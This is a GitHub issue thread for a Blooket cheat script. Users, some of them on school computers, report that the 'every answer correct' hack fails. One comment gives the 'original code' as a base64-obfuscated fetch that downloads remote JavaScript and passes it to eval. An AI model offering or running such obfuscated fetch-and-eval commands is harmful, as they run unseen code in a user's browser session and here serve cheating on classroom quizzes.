### ISSUE TITLE
Every answer correct not working

### ISSUE THREAD

**Issue by thedudemeister08** [glixzzy/blooket-hack#719]
It was fine yesterday now it's not loading.

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by jerren1231** [comment]
help

**Comment by jerren1231** [comment]
the all answer correct is really not working
someone fix it

**Comment by jerren1231** [comment]
fix the blooket hack pls

**Comment by jerren1231** [comment]
i need itttt

**Comment by thedudemeister08** [comment]
Google chrome
 Both school and home with WiFi 
Bookmarklet
 Yes it has worked in the past.
Yes it’s the original code.

**Comment by thedudemeister08** [comment]
Google chrome
School and home with WiFi
Bookmarklet
Yes it has worked before
Yes it’s the original code

**Comment by cryptominecrafter** [comment]
I am having a similar problem but with all of the hacks. Try using other hacks too. Do those work?

**Comment by donaldli2020** [comment]
Every answer correct doesn't work on battle royale

**Comment by glixzzy** [comment]
just tried it works
